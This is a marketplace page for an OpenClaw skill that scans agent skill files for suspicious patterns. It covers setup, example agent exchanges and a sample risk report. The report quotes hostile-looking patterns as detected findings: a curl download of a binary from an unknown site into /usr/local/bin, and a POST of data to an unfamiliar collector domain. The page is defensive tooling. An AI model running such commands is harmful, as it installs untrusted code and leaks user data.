security-skill-scannerScans OpenClaw skills for security vulnerabilities and suspicious patterns before installation
Install via ClawdBot CLI:
clawdbot install anikrahman0/security-skill-scannerA security-focused skill that analyzes OpenClaw SKILL.md files and skill packages for potential security risks, malicious patterns, and suspicious behaviors. This tool helps protect your system by detecting:
Why this matters: This scanner helps you review skills before installation by flagging potentially suspicious instruction patterns.
This is an OpenClaw skill (not a standalone program). When you ask the agent to scan a skill file:
Note: The included scanner.js file can also be run directly with Node.js 18+ if you prefer command-line usage.
Install via ClawHub or add to your OpenClaw skills directory.
For command-line usage (optional):
# Clone the repository
git clone https://github.com/anikrahman0/security-skill-scanner.git
cd security-skill-scanner
# Run the scanner
node scanner.js path/to/SKILL.mdCreate a .security-scanner-config.json in your OpenClaw directory (optional):
{
"whitelistedDomains": [
"github.com",
"api.openai.com",
"api.anthropic.com",
"raw.githubusercontent.com"
],
"whitelistedCommands": [
"npm install",
"pip install"
],
"strictMode": false
}User: "Scan the skill file at ~/Downloads/new-skill/SKILL.md for security issues"
Agent: [Runs security scan and reports findings]User: "I have the email-automation skill file. Can you scan it for security risks?"
[User uploads the SKILL.md file]
Agent: [Reads and analyzes the skill file, provides risk assessment]Important: If you ask Claude to download a skill from the internet first, that download step will use network access (though the scanner itself runs offline).
User: "Scan all my installed OpenClaw skills for security issues"
Agent: [Scans all skills in ~/.openclaw/skills/ and generates report]The scanner uses regex patterns that may match innocent code. Common false positives:
backticks ${variable} syntaxnpm install or pip install commandsraw.githubusercontent.comSkills are markdown instruction files, not executable code. This scanner:
YOU must review all flagged items in context. Ask yourself:
When in doubt, ask the skill author or community.
=== Security Scan Report ===
Skill: email-automation
Scanned: 2024-02-09 14:30:22
Overall Risk: HIGH โ ๏ธ
FINDINGS:
[CRITICAL] External Binary Download Detected
Location: Line 45 in prerequisites
Pattern: curl https://unknown-site.com/tool -o /usr/local/bin/helper
Risk: This downloads and executes an external binary from an untrusted source
Recommendation: DO NOT INSTALL - Manual verification required
[HIGH] Suspicious API Endpoint
Location: Line 89 in execute()
Pattern: POST to http://data-collector.xyz/log
Risk: Sends data to unknown third-party server
Recommendation: Review what data is being sent
[MEDIUM] Unencrypted Network Request
Location: Line 102
Pattern: HTTP instead of HTTPS
Risk: Data transmitted without encryption
Recommendation: Request HTTPS version
SUMMARY:
Total Issues: 3
Critical: 1
High: 1
Medium: 1
Low: 0
RECOMMENDATION: โ DO NOT INSTALL
This skill has critical security issues that pose significant risk to your system.User: "Scan the weather-checker skill"
Agent: "โ
SAFE - No security issues detected. The skill uses standard API calls
to api.weatherapi.com with proper HTTPS and no file system access."User: "Should I install the productivity-helper skill?"
Agent: "โ ๏ธ WARNING - This skill attempts to download an external binary and
makes requests to an unknown domain. Risk Level: CRITICAL
Recommendation: DO NOT INSTALL"User: "Analyze the note-taker skill"
Agent: "โ ๏ธ CAUTION - Risk Level: LOW
Found 2 minor issues:
- Uses HTTP instead of HTTPS for icon download
- Missing input validation on file paths
These can likely be fixed. Consider contacting the author."This scanner itself is designed with security in mind:
The scanner may flag legitimate uses of certain patterns. Common false positives:
Use judgment and review flagged items in context.
This tool is a helpful first line of defense, but not a replacement for careful review.
Found a malicious pattern not detected? Submit an issue or PR with:
MIT License - Free to use, modify, and distribute
This tool provides pattern-based security scanning with expected false positives. It scans instruction files (markdown), not executable code.
Critical: This scanner cannot provide definitive security verdicts. All flagged items require manual review in context. Skills are instructions for Claude to read, not programs that execute automatically.
Always review skills carefully before installation, especially those requiring system-level permissions. The authors are not responsible for any damages resulting from use of this tool or installation of scanned skills.
Remember: If a skill seems too good to be true or requests unusual permissions, it probably is suspicious. When in doubt, don't install it.
Generated Mar 1, 2026
AI agent platforms can integrate this scanner to automatically vet third-party skills submitted by developers before listing them in marketplaces. This ensures all available skills meet basic security standards, reducing the risk of malicious skills harming end-users' systems or data. It acts as a first-line defense in the skill approval workflow.
Large organizations deploying internal AI assistants can use this scanner to review custom-built skills for security compliance. IT security teams can scan skills for suspicious patterns like unauthorized data exfiltration or unsafe system commands before allowing installation on corporate devices. This helps enforce security policies in AI-driven automation.
Open-source developers creating skills for community platforms can run this scanner during development to self-audit their code for accidental security issues, such as hardcoded credentials or unsafe API calls. It serves as a quality assurance tool to build trust and encourage adoption by flagging potential risks early in the development cycle.
Educational institutions teaching AI agent development can incorporate this scanner into curricula to demonstrate security best practices. Students learn to identify and avoid malicious patterns in skill instructions, fostering awareness of AI safety principles. It provides hands-on experience with real-world security analysis tools.
Freelance security consultants can offer skill auditing services to clients who need independent verification of AI agent skills. Using this scanner, they can generate detailed risk reports for skills sourced from third parties, helping businesses make informed decisions about installation and reducing liability from security breaches.
Offer a free basic version of the scanner for individual users, with premium features like batch scanning, advanced pattern detection, and integration APIs for enterprises. Revenue comes from subscription fees for teams and organizations needing enhanced security workflows and support. This model encourages widespread adoption while monetizing advanced needs.
Partner with AI agent platform providers to embed the scanner as a core security service, charging licensing fees based on usage volume or number of scans. Revenue is generated through B2B contracts that include customization, maintenance, and regular updates to threat detection patterns. This leverages the growing demand for integrated security in AI ecosystems.
Provide bespoke consulting services to businesses that require tailored security scanning solutions, such as custom whitelists, industry-specific pattern detection, or integration with existing security tools. Revenue comes from project-based fees and ongoing support contracts, targeting organizations with unique compliance or operational requirements.
๐ฌ Integration Tip
Integrate the scanner into CI/CD pipelines for skill development to automate security checks before deployment, ensuring consistent safety reviews.
Set up and use 1Password CLI (op). Use when installing the CLI, enabling desktop app integration, signing in (single or multi-account), or reading/injecting/running secrets via op.
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
Perform a comprehensive read-only security audit of Clawdbot's own configuration. This is a knowledge-based skill that teaches Clawdbot to identify hardening opportunities across the system. Use when user asks to "run security check", "audit clawdbot", "check security hardening", or "what vulnerabilities does my Clawdbot have". This skill uses Clawdbot's internal capabilities and file system access to inspect configuration, detect misconfigurations, and recommend remediations. It is designed to be extensible - new checks can be added by updating this skill's knowledge.
Use when reviewing code for security vulnerabilities, implementing authentication flows, auditing OWASP Top 10, configuring CORS/CSP headers, handling secrets, input validation, SQL injection prevention, XSS protection, or any security-related code review.
Security check for ClawHub skills powered by Koi. Query the Clawdex API before installing any skill to verify it's safe.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.